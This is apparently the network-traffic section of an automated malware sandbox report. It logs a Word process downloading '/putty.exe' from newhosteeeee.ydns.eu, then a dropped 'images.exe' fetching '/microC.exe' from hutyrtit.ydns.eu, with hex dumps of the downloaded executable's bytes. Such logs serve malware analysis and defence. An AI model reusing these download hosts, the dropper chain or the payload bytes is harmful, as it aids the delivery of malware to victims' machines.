                                Aug 2, 2021 10:59:54.251281023 CEST3INData Raw: 46 00 00 0a 28 44 00 00 0a 80 0a 00 00 04 2a 1e 02 28 47 00 00 0a 2a 00 13 30 01 00 1d 00 00 00 09 00 00 11 00 28 07 00 00 06 6f 48 00 00 0a 0a 06 2c 0c 28 13 00 00 06 6f 49 00 00 0a 00 00 00 2a 00 00 00 1b 30 03 00 65 00 00 00 0a 00 00 11 00 7e
                                Data Ascii: F(D*(G*0(oH,(oI*0e~,M~(J(K~,(sLoM(N~+*"-O0(+*(F*&}*
                                Aug 2, 2021 10:59:54.251302004 CEST4INData Raw: 61 00 00 0a 00 02 6f 2c 00 00 06 1a 6f 62 00 00 0a 00 02 6f 2c 00 00 06 72 39 01 00 70 6f 63 00 00 0a 00 02 6f 2e 00 00 06 1f 78 1f 5e 73 5b 00 00 0a 6f 5c 00 00 0a 00 02 6f 2e 00 00 06 72 45 01 00 70 6f 5f 00 00 0a 00 02 6f 2e 00 00 06 20 a8 00
                                Data Ascii: ao,obo,r9poco.x^s[o\o.rEpo_o. s`oao.obo0oXo0rop"AsYoZo0ds[o\o0s]o^o0rWpo_o0*s`oao0ob
                                Aug 2, 2021 10:59:54.251323938 CEST6INData Raw: 6f 32 00 00 06 6f 73 00 00 0a 00 2a 13 30 03 00 5c 00 00 00 09 00 00 11 00 02 6f 24 00 00 06 6f 74 00 00 0a 6f 75 00 00 0a 16 fe 01 0a 06 2c 22 04 17 6f 76 00 00 0a 00 02 6f 36 00 00 06 02 6f 24 00 00 06 72 c5 01 00 70 6f 77 00 00 0a 00 00 2b 21
                                Data Ascii: o2os*0\o$otou,"ovo6o$rpow+!ovo6o$rpow*0\o*otou,"ovo6o*rpow+!ovo6o*rpow*0\o.ot
                                Aug 2, 2021 10:59:54.282464981 CEST7INData Raw: 00 02 28 88 00 00 0a 00 00 00 2a 00 00 00 13 30 01 00 0c 00 00 00 14 00 00 11 00 02 7b 20 00 00 04 0a 2b 00 06 2a 13 30 02 00 55 00 00 00 15 00 00 11 00 03 1f 18 fe 04 0a 06 2c 04 1f 18 10 01 03 20 2c 01 00 00 fe 02 0b 07 2c 07 20 2c 01 00 00 10
                                Data Ascii: (*0{ +*0U, ,, ,{ ,"} {}(X(*0{!+*0M,,{!,"}!{}(X(
                                Aug 2, 2021 10:59:54.282495975 CEST9INData Raw: 00 0a 02 28 6a 00 00 0a 6f 86 00 00 0a 17 da 6f 87 00 00 0a 74 36 00 00 01 6f 9d 00 00 0a 00 2a 13 30 02 00 37 00 00 00 18 00 00 11 00 02 7b 1d 00 00 04 0a 17 0b 2b 0b 02 28 57 00 00 06 00 07 17 d6 0b 07 06 31 f1 02 7b 1e 00 00 04 0c 17 0d 2b 0c
                                Data Ascii: (joot6o*07{+(W1{+(U1*0rp+*0r'p+*0+*0*0(r5p(+*0(r
                                Aug 2, 2021 10:59:54.282511950 CEST10INData Raw: 1f 37 73 60 00 00 0a 28 bf 00 00 0a 00 02 28 6a 00 00 0a 02 6f 6c 00 00 06 6f 6b 00 00 0a 00 02 16 28 c0 00 00 0a 00 02 16 28 c1 00 00 0a 00 02 72 05 04 00 70 28 5f 00 00 0a 00 02 16 28 c2 00 00 0a 00 02 18 28 c3 00 00 0a 00 02 72 21 04 00 70 6f
                                Data Ascii: 7s`((jolok((rp(_((r!poolonoloo(n*&{.+*"}.*&{/+*"}/*&{0+*"}0*&{1+*"}1*&{2+*07us{2
                                Aug 2, 2021 10:59:54.282535076 CEST11INData Raw: 6f d9 00 00 06 00 02 73 de 00 00 0a 6f db 00 00 06 00 02 73 d8 00 00 0a 6f dd 00 00 06 00 02 73 d8 00 00 0a 6f df 00 00 06 00 02 73 d8 00 00 0a 6f e1 00 00 06 00 02 73 d8 00 00 0a 6f f5 00 00 06 00 02 73 d8 00 00 0a 6f ef 00 00 06 00 02 73 d8 00
                                Data Ascii: ososososososososososoo|oWooVooWooWooVooWooVooWooVooW
                                Aug 2, 2021 10:59:54.282556057 CEST13INData Raw: 6f 5f 00 00 0a 00 02 6f 8a 00 00 06 1b 73 6c 00 00 0a 6f ee 00 00 0a 00 02 6f 8a 00 00 06 20 d4 01 00 00 20 82 01 00 00 73 60 00 00 0a 6f 61 00 00 0a 00 02 6f 8a 00 00 06 1b 6f 62 00 00 0a 00 02 6f 8c 00 00 06 17 6f ea 00 00 0a 00 02 6f 8c 00 00
                                Data Ascii: o_osloo s`oaooboooor@porpsoos[o\orpo_os]oo s`oaooborpoooo
                                Aug 2, 2021 10:59:54.282576084 CEST14INData Raw: 06 17 6f 7e 00 00 0a 00 02 6f ae 00 00 06 16 6f 7f 00 00 0a 00 02 6f ae 00 00 06 19 6f b3 00 00 0a 00 02 6f ae 00 00 06 6f b4 00 00 0a 73 f0 00 00 0a 6f b6 00 00 0a 26 02 6f ae 00 00 06 6f b4 00 00 0a 73 f0 00 00 0a 6f b6 00 00 0a 26 02 6f ae 00
                                Data Ascii: o~ooooooso&ooso&ooso&oo"Aso&ooooooooooooo s[o\orpo_
                                Aug 2, 2021 10:59:54.282597065 CEST15INData Raw: 06 00 70 02 6f 86 00 00 06 72 55 0a 00 70 17 17 73 f1 00 00 0a 6f ed 00 00 0a 00 02 6f b8 00 00 06 19 1c 73 5b 00 00 0a 6f 5c 00 00 0a 00 02 6f b8 00 00 06 72 65 0a 00 70 6f 5f 00 00 0a 00 02 6f b8 00 00 06 1f 0f 1f 0e 73 60 00 00 0a 6f 61 00 00
                                Data Ascii: porUpsoos[o\orepo_os`oaooboooor<porUpsooor porypsoos[o\orpo_o3s`oa


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                1192.168.2.2249166203.159.80.18680C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                TimestampkBytes transferredDirectionData
                                Aug 2, 2021 10:59:57.762746096 CEST778OUTGET /putty.exe HTTP/1.1
                                Host: newhosteeeee.ydns.eu
                                Connection: Keep-Alive
                                Aug 2, 2021 10:59:57.833343983 CEST779INHTTP/1.1 200 OK
                                Content-Type: application/octet-stream
                                Last-Modified: Sun, 01 Aug 2021 22:25:10 GMT
                                Accept-Ranges: bytes
                                ETag: "6ca734172487d71:0"
                                Server: Microsoft-IIS/8.5
                                Date: Mon, 02 Aug 2021 08:59:57 GMT
                                Content-Length: 731648
                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 46 1f 07 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 20 0b 00 00 08 00 00 00 00 00 00 7a 3b 0b 00 00 20 00 00 00 40 0b 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 0b 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 28 3b 0b 00 4f 00 00 00 00 40 0b 00 e4 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 0b 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 60 1f 0b 00 00 20 00 00 00 20 0b 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 e4 05 00 00 00 40 0b 00 00 06 00 00 00 22 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 0b 00 00 02 00 00 00 28 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 5c 3b 0b 00 00 00 00 00 48 00 00 00 02 00 05 00 00 f2 00 00 08 d2 02 00 03 00 00 00 01 00 00 06 08 c4 03 00 20 77 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 30 02 00 1f 00 00 00 00 00 00 00 00 00 28 2b 00 00 0a 28 2c 00 00 0a 00 de 02 00 dc 00 28 07 00 00 06 02 6f 2d 00 00 0a 00 2a 00 01 10 00 00 02 00 01 00 0e 0f 00 02 00 00 00 00 aa 00 02 16 28 2e 00 00 0a 00 02 16 28 2f 00 00 0a 00 02 17 28 30 00 00 0a 00 02 17 28 31 00 00 0a 00 02 16 28 32 00 00 0a 00 2a 4e 00 02 28 09 00 00 06 6f 17 02 00 06 28 33 00 00 0a 00 2a 26 00 02 28 34 00 00 0a 00 2a ce 73 35 00 00 0a 80 01 00 00 04 73 36 00 00 0a 80 02 00 00 04 73 37 00 00 0a 80 03 00 00 04 73 38 00 00 0a 80 04 00 00 04 73 39 00 00 0a 80 05 00 00 04 2a 00 00 00 13 30 01 00 10 00 00 00 01 00 00 11 00 7e 01 00 00 04 6f 3a 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 02 00 00 11 00 7e 02 00 00 04 6f 3b 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 03 00 00 11 00 7e 03 00 00 04 6f 3c 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 04 00 00 11 00 7e 04 00 00 04 6f 3d 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 05 00 00 11 00 7e 05 00 00 04 6f 3e 00 00 0a 0a 2b 00 06 2a 13 30 02 00 3c 00 00 00 06 00 00 11 00 7e 06 00 00 04 14 28 3f 00 00 0a 0b 07 2c 21 72 01 00 00 70 d0 05 00 00 02 28 40 00 00 0a 6f 41 00 00 0a 73 42 00 00 0a 0c 08 80 06 00 00 04 00 00 7e 06 00 00 04 0a 2b 00 06 2a 13 30 01 00 0b 00 00 00 07 00 00 11 00 7e 07 00 00 04 0a 2b 00 06 2a 22 00 02 80 07 00 00 04 2a 13 30 03 00 26 00 00 00 08 00 00 11 00 28 0b 00 00 06 72 3f 00 00 70 7e 07 00 00 04 6f 43 00 00 0a 28 44 00 00 0a 0b 07 74 25 00 00 01 0a 2b 00 06 2a 92 73 10 00 00 06 28 45 00 00 0a 74 06 00 00 02 80 08 00 00 04 73
                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELFaP z; @@ @(;O@` H.text` `.rsrc@"@@.reloc`(@B\;H w0(+(,(o-*(.(/(0(1(2*N(o(3*&(4*s5s6s7s8s9*0~o:+*0~o;+*0~o<+*0~o=+*0~o>+*0<~(?,!rp(@oAsB~+*0~+*"*0&(r?p~oC(Dt%+*s(Ets
                                Aug 2, 2021 10:59:57.833374023 CEST780INData Raw: 46 00 00 0a 28 44 00 00 0a 80 0a 00 00 04 2a 1e 02 28 47 00 00 0a 2a 00 13 30 01 00 1d 00 00 00 09 00 00 11 00 28 07 00 00 06 6f 48 00 00 0a 0a 06 2c 0c 28 13 00 00 06 6f 49 00 00 0a 00 00 00 2a 00 00 00 1b 30 03 00 65 00 00 00 0a 00 00 11 00 7e
                                Data Ascii: F(D*(G*0(oH,(oI*0e~,M~(J(K~,(sLoM(N~+*"-O0(+*(F*&}*
                                Aug 2, 2021 10:59:57.833385944 CEST782INData Raw: 61 00 00 0a 00 02 6f 2c 00 00 06 1a 6f 62 00 00 0a 00 02 6f 2c 00 00 06 72 39 01 00 70 6f 63 00 00 0a 00 02 6f 2e 00 00 06 1f 78 1f 5e 73 5b 00 00 0a 6f 5c 00 00 0a 00 02 6f 2e 00 00 06 72 45 01 00 70 6f 5f 00 00 0a 00 02 6f 2e 00 00 06 20 a8 00
                                Data Ascii: ao,obo,r9poco.x^s[o\o.rEpo_o. s`oao.obo0oXo0rop"AsYoZo0ds[o\o0s]o^o0rWpo_o0*s`oao0ob
                                Aug 2, 2021 10:59:57.833421946 CEST783INData Raw: 6f 32 00 00 06 6f 73 00 00 0a 00 2a 13 30 03 00 5c 00 00 00 09 00 00 11 00 02 6f 24 00 00 06 6f 74 00 00 0a 6f 75 00 00 0a 16 fe 01 0a 06 2c 22 04 17 6f 76 00 00 0a 00 02 6f 36 00 00 06 02 6f 24 00 00 06 72 c5 01 00 70 6f 77 00 00 0a 00 00 2b 21
                                Data Ascii: o2os*0\o$otou,"ovo6o$rpow+!ovo6o$rpow*0\o*otou,"ovo6o*rpow+!ovo6o*rpow*0\o.ot
                                Aug 2, 2021 10:59:57.862334967 CEST785INData Raw: 00 02 28 88 00 00 0a 00 00 00 2a 00 00 00 13 30 01 00 0c 00 00 00 14 00 00 11 00 02 7b 20 00 00 04 0a 2b 00 06 2a 13 30 02 00 55 00 00 00 15 00 00 11 00 03 1f 18 fe 04 0a 06 2c 04 1f 18 10 01 03 20 2c 01 00 00 fe 02 0b 07 2c 07 20 2c 01 00 00 10
                                Data Ascii: (*0{ +*0U, ,, ,{ ,"} {}(X(*0{!+*0M,,{!,"}!{}(X(
                                Aug 2, 2021 10:59:57.862365961 CEST786INData Raw: 00 0a 02 28 6a 00 00 0a 6f 86 00 00 0a 17 da 6f 87 00 00 0a 74 36 00 00 01 6f 9d 00 00 0a 00 2a 13 30 02 00 37 00 00 00 18 00 00 11 00 02 7b 1d 00 00 04 0a 17 0b 2b 0b 02 28 57 00 00 06 00 07 17 d6 0b 07 06 31 f1 02 7b 1e 00 00 04 0c 17 0d 2b 0c
                                Data Ascii: (joot6o*07{+(W1{+(U1*0rp+*0r'p+*0+*0*0(r5p(+*0(r
                                Aug 2, 2021 10:59:57.862379074 CEST787INData Raw: 1f 37 73 60 00 00 0a 28 bf 00 00 0a 00 02 28 6a 00 00 0a 02 6f 6c 00 00 06 6f 6b 00 00 0a 00 02 16 28 c0 00 00 0a 00 02 16 28 c1 00 00 0a 00 02 72 05 04 00 70 28 5f 00 00 0a 00 02 16 28 c2 00 00 0a 00 02 18 28 c3 00 00 0a 00 02 72 21 04 00 70 6f
                                Data Ascii: 7s`((jolok((rp(_((r!poolonoloo(n*&{.+*"}.*&{/+*"}/*&{0+*"}0*&{1+*"}1*&{2+*07us{2
                                Aug 2, 2021 10:59:57.862413883 CEST789INData Raw: 6f d9 00 00 06 00 02 73 de 00 00 0a 6f db 00 00 06 00 02 73 d8 00 00 0a 6f dd 00 00 06 00 02 73 d8 00 00 0a 6f df 00 00 06 00 02 73 d8 00 00 0a 6f e1 00 00 06 00 02 73 d8 00 00 0a 6f f5 00 00 06 00 02 73 d8 00 00 0a 6f ef 00 00 06 00 02 73 d8 00
                                Data Ascii: ososososososososososoo|oWooVooWooWooVooWooVooWooVooW
                                Aug 2, 2021 10:59:57.862435102 CEST790INData Raw: 6f 5f 00 00 0a 00 02 6f 8a 00 00 06 1b 73 6c 00 00 0a 6f ee 00 00 0a 00 02 6f 8a 00 00 06 20 d4 01 00 00 20 82 01 00 00 73 60 00 00 0a 6f 61 00 00 0a 00 02 6f 8a 00 00 06 1b 6f 62 00 00 0a 00 02 6f 8c 00 00 06 17 6f ea 00 00 0a 00 02 6f 8c 00 00
                                Data Ascii: o_osloo s`oaooboooor@porpsoos[o\orpo_os]oo s`oaooborpoooo
                                Aug 2, 2021 10:59:57.862456083 CEST791INData Raw: 06 17 6f 7e 00 00 0a 00 02 6f ae 00 00 06 16 6f 7f 00 00 0a 00 02 6f ae 00 00 06 19 6f b3 00 00 0a 00 02 6f ae 00 00 06 6f b4 00 00 0a 73 f0 00 00 0a 6f b6 00 00 0a 26 02 6f ae 00 00 06 6f b4 00 00 0a 73 f0 00 00 0a 6f b6 00 00 0a 26 02 6f ae 00
                                Data Ascii: o~ooooooso&ooso&ooso&oo"Aso&ooooooooooooo s[o\orpo_
                                Aug 2, 2021 10:59:57.891263008 CEST793INData Raw: 06 00 70 02 6f 86 00 00 06 72 55 0a 00 70 17 17 73 f1 00 00 0a 6f ed 00 00 0a 00 02 6f b8 00 00 06 19 1c 73 5b 00 00 0a 6f 5c 00 00 0a 00 02 6f b8 00 00 06 72 65 0a 00 70 6f 5f 00 00 0a 00 02 6f b8 00 00 06 1f 0f 1f 0e 73 60 00 00 0a 6f 61 00 00
                                Data Ascii: porUpsoos[o\orepo_os`oaooboooor<porUpsooor porypsoos[o\orpo_o3s`oa


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                2192.168.2.2249167203.159.80.18680C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                TimestampkBytes transferredDirectionData
                                Aug 2, 2021 10:59:58.669049025 CEST1537OUTGET /putty.exe HTTP/1.1
                                Host: newhosteeeee.ydns.eu
                                Connection: Keep-Alive
                                Aug 2, 2021 10:59:58.711807013 CEST1538INHTTP/1.1 200 OK
                                Content-Type: application/octet-stream
                                Last-Modified: Sun, 01 Aug 2021 22:25:10 GMT
                                Accept-Ranges: bytes
                                ETag: "6ca734172487d71:0"
                                Server: Microsoft-IIS/8.5
                                Date: Mon, 02 Aug 2021 08:59:57 GMT
                                Content-Length: 731648
                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 46 1f 07 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 20 0b 00 00 08 00 00 00 00 00 00 7a 3b 0b 00 00 20 00 00 00 40 0b 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 0b 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 28 3b 0b 00 4f 00 00 00 00 40 0b 00 e4 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 0b 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 60 1f 0b 00 00 20 00 00 00 20 0b 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 e4 05 00 00 00 40 0b 00 00 06 00 00 00 22 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 0b 00 00 02 00 00 00 28 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 5c 3b 0b 00 00 00 00 00 48 00 00 00 02 00 05 00 00 f2 00 00 08 d2 02 00 03 00 00 00 01 00 00 06 08 c4 03 00 20 77 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 30 02 00 1f 00 00 00 00 00 00 00 00 00 28 2b 00 00 0a 28 2c 00 00 0a 00 de 02 00 dc 00 28 07 00 00 06 02 6f 2d 00 00 0a 00 2a 00 01 10 00 00 02 00 01 00 0e 0f 00 02 00 00 00 00 aa 00 02 16 28 2e 00 00 0a 00 02 16 28 2f 00 00 0a 00 02 17 28 30 00 00 0a 00 02 17 28 31 00 00 0a 00 02 16 28 32 00 00 0a 00 2a 4e 00 02 28 09 00 00 06 6f 17 02 00 06 28 33 00 00 0a 00 2a 26 00 02 28 34 00 00 0a 00 2a ce 73 35 00 00 0a 80 01 00 00 04 73 36 00 00 0a 80 02 00 00 04 73 37 00 00 0a 80 03 00 00 04 73 38 00 00 0a 80 04 00 00 04 73 39 00 00 0a 80 05 00 00 04 2a 00 00 00 13 30 01 00 10 00 00 00 01 00 00 11 00 7e 01 00 00 04 6f 3a 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 02 00 00 11 00 7e 02 00 00 04 6f 3b 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 03 00 00 11 00 7e 03 00 00 04 6f 3c 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 04 00 00 11 00 7e 04 00 00 04 6f 3d 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 05 00 00 11 00 7e 05 00 00 04 6f 3e 00 00 0a 0a 2b 00 06 2a 13 30 02 00 3c 00 00 00 06 00 00 11 00 7e 06 00 00 04 14 28 3f 00 00 0a 0b 07 2c 21 72 01 00 00 70 d0 05 00 00 02 28 40 00 00 0a 6f 41 00 00 0a 73 42 00 00 0a 0c 08 80 06 00 00 04 00 00 7e 06 00 00 04 0a 2b 00 06 2a 13 30 01 00 0b 00 00 00 07 00 00 11 00 7e 07 00 00 04 0a 2b 00 06 2a 22 00 02 80 07 00 00 04 2a 13 30 03 00 26 00 00 00 08 00 00 11 00 28 0b 00 00 06 72 3f 00 00 70 7e 07 00 00 04 6f 43 00 00 0a 28 44 00 00 0a 0b 07 74 25 00 00 01 0a 2b 00 06 2a 92 73 10 00 00 06 28 45 00 00 0a 74 06 00 00 02 80 08 00 00 04 73
                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELFaP z; @@ @(;O@` H.text` `.rsrc@"@@.reloc`(@B\;H w0(+(,(o-*(.(/(0(1(2*N(o(3*&(4*s5s6s7s8s9*0~o:+*0~o;+*0~o<+*0~o=+*0~o>+*0<~(?,!rp(@oAsB~+*0~+*"*0&(r?p~oC(Dt%+*s(Ets
                                Aug 2, 2021 10:59:58.711848974 CEST1540INData Raw: 46 00 00 0a 28 44 00 00 0a 80 0a 00 00 04 2a 1e 02 28 47 00 00 0a 2a 00 13 30 01 00 1d 00 00 00 09 00 00 11 00 28 07 00 00 06 6f 48 00 00 0a 0a 06 2c 0c 28 13 00 00 06 6f 49 00 00 0a 00 00 00 2a 00 00 00 1b 30 03 00 65 00 00 00 0a 00 00 11 00 7e
                                Data Ascii: F(D*(G*0(oH,(oI*0e~,M~(J(K~,(sLoM(N~+*"-O0(+*(F*&}*
                                Aug 2, 2021 10:59:58.711873055 CEST1541INData Raw: 61 00 00 0a 00 02 6f 2c 00 00 06 1a 6f 62 00 00 0a 00 02 6f 2c 00 00 06 72 39 01 00 70 6f 63 00 00 0a 00 02 6f 2e 00 00 06 1f 78 1f 5e 73 5b 00 00 0a 6f 5c 00 00 0a 00 02 6f 2e 00 00 06 72 45 01 00 70 6f 5f 00 00 0a 00 02 6f 2e 00 00 06 20 a8 00
                                Data Ascii: ao,obo,r9poco.x^s[o\o.rEpo_o. s`oao.obo0oXo0rop"AsYoZo0ds[o\o0s]o^o0rWpo_o0*s`oao0ob
                                Aug 2, 2021 10:59:58.711899042 CEST1542INData Raw: 6f 32 00 00 06 6f 73 00 00 0a 00 2a 13 30 03 00 5c 00 00 00 09 00 00 11 00 02 6f 24 00 00 06 6f 74 00 00 0a 6f 75 00 00 0a 16 fe 01 0a 06 2c 22 04 17 6f 76 00 00 0a 00 02 6f 36 00 00 06 02 6f 24 00 00 06 72 c5 01 00 70 6f 77 00 00 0a 00 00 2b 21
                                Data Ascii: o2os*0\o$otou,"ovo6o$rpow+!ovo6o$rpow*0\o*otou,"ovo6o*rpow+!ovo6o*rpow*0\o.ot
                                Aug 2, 2021 10:59:58.741183996 CEST1544INData Raw: 00 02 28 88 00 00 0a 00 00 00 2a 00 00 00 13 30 01 00 0c 00 00 00 14 00 00 11 00 02 7b 20 00 00 04 0a 2b 00 06 2a 13 30 02 00 55 00 00 00 15 00 00 11 00 03 1f 18 fe 04 0a 06 2c 04 1f 18 10 01 03 20 2c 01 00 00 fe 02 0b 07 2c 07 20 2c 01 00 00 10
                                Data Ascii: (*0{ +*0U, ,, ,{ ,"} {}(X(*0{!+*0M,,{!,"}!{}(X(
                                Aug 2, 2021 10:59:58.741218090 CEST1545INData Raw: 00 0a 02 28 6a 00 00 0a 6f 86 00 00 0a 17 da 6f 87 00 00 0a 74 36 00 00 01 6f 9d 00 00 0a 00 2a 13 30 02 00 37 00 00 00 18 00 00 11 00 02 7b 1d 00 00 04 0a 17 0b 2b 0b 02 28 57 00 00 06 00 07 17 d6 0b 07 06 31 f1 02 7b 1e 00 00 04 0c 17 0d 2b 0c
                                Data Ascii: (joot6o*07{+(W1{+(U1*0rp+*0r'p+*0+*0*0(r5p(+*0(r
                                Aug 2, 2021 10:59:58.741241932 CEST1547INData Raw: 1f 37 73 60 00 00 0a 28 bf 00 00 0a 00 02 28 6a 00 00 0a 02 6f 6c 00 00 06 6f 6b 00 00 0a 00 02 16 28 c0 00 00 0a 00 02 16 28 c1 00 00 0a 00 02 72 05 04 00 70 28 5f 00 00 0a 00 02 16 28 c2 00 00 0a 00 02 18 28 c3 00 00 0a 00 02 72 21 04 00 70 6f
                                Data Ascii: 7s`((jolok((rp(_((r!poolonoloo(n*&{.+*"}.*&{/+*"}/*&{0+*"}0*&{1+*"}1*&{2+*07us{2
                                Aug 2, 2021 10:59:58.741264105 CEST1548INData Raw: 6f d9 00 00 06 00 02 73 de 00 00 0a 6f db 00 00 06 00 02 73 d8 00 00 0a 6f dd 00 00 06 00 02 73 d8 00 00 0a 6f df 00 00 06 00 02 73 d8 00 00 0a 6f e1 00 00 06 00 02 73 d8 00 00 0a 6f f5 00 00 06 00 02 73 d8 00 00 0a 6f ef 00 00 06 00 02 73 d8 00
                                Data Ascii: ososososososososososoo|oWooVooWooWooVooWooVooWooVooW
                                Aug 2, 2021 10:59:58.741287947 CEST1549INData Raw: 6f 5f 00 00 0a 00 02 6f 8a 00 00 06 1b 73 6c 00 00 0a 6f ee 00 00 0a 00 02 6f 8a 00 00 06 20 d4 01 00 00 20 82 01 00 00 73 60 00 00 0a 6f 61 00 00 0a 00 02 6f 8a 00 00 06 1b 6f 62 00 00 0a 00 02 6f 8c 00 00 06 17 6f ea 00 00 0a 00 02 6f 8c 00 00
                                Data Ascii: o_osloo s`oaooboooor@porpsoos[o\orpo_os]oo s`oaooborpoooo
                                Aug 2, 2021 10:59:58.741311073 CEST1551INData Raw: 06 17 6f 7e 00 00 0a 00 02 6f ae 00 00 06 16 6f 7f 00 00 0a 00 02 6f ae 00 00 06 19 6f b3 00 00 0a 00 02 6f ae 00 00 06 6f b4 00 00 0a 73 f0 00 00 0a 6f b6 00 00 0a 26 02 6f ae 00 00 06 6f b4 00 00 0a 73 f0 00 00 0a 6f b6 00 00 0a 26 02 6f ae 00
                                Data Ascii: o~ooooooso&ooso&ooso&oo"Aso&ooooooooooooo s[o\orpo_
                                Aug 2, 2021 10:59:58.741338015 CEST1552INData Raw: 06 00 70 02 6f 86 00 00 06 72 55 0a 00 70 17 17 73 f1 00 00 0a 6f ed 00 00 0a 00 02 6f b8 00 00 06 19 1c 73 5b 00 00 0a 6f 5c 00 00 0a 00 02 6f b8 00 00 06 72 65 0a 00 70 6f 5f 00 00 0a 00 02 6f b8 00 00 06 1f 0f 1f 0e 73 60 00 00 0a 6f 61 00 00
                                Data Ascii: porUpsoos[o\orepo_os`oaooboooor<porUpsooor porypsoos[o\orpo_o3s`oa


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                3192.168.2.2249169203.159.80.16580C:\ProgramData\images.exe
                                TimestampkBytes transferredDirectionData
                                Aug 2, 2021 11:00:29.636285067 CEST2381OUTGET /microC.exe HTTP/1.1
                                Accept: */*
                                Accept-Encoding: gzip, deflate
                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                Host: hutyrtit.ydns.eu
                                Connection: Keep-Alive
                                Aug 2, 2021 11:00:29.667159081 CEST2383INHTTP/1.1 200 OK
                                Content-Type: application/octet-stream
                                Last-Modified: Mon, 02 Aug 2021 07:13:53 GMT
                                Accept-Ranges: bytes
                                ETag: "382415f36d87d71:0"
                                Server: Microsoft-IIS/8.5
                                Date: Mon, 02 Aug 2021 09:00:29 GMT
                                Content-Length: 1378816
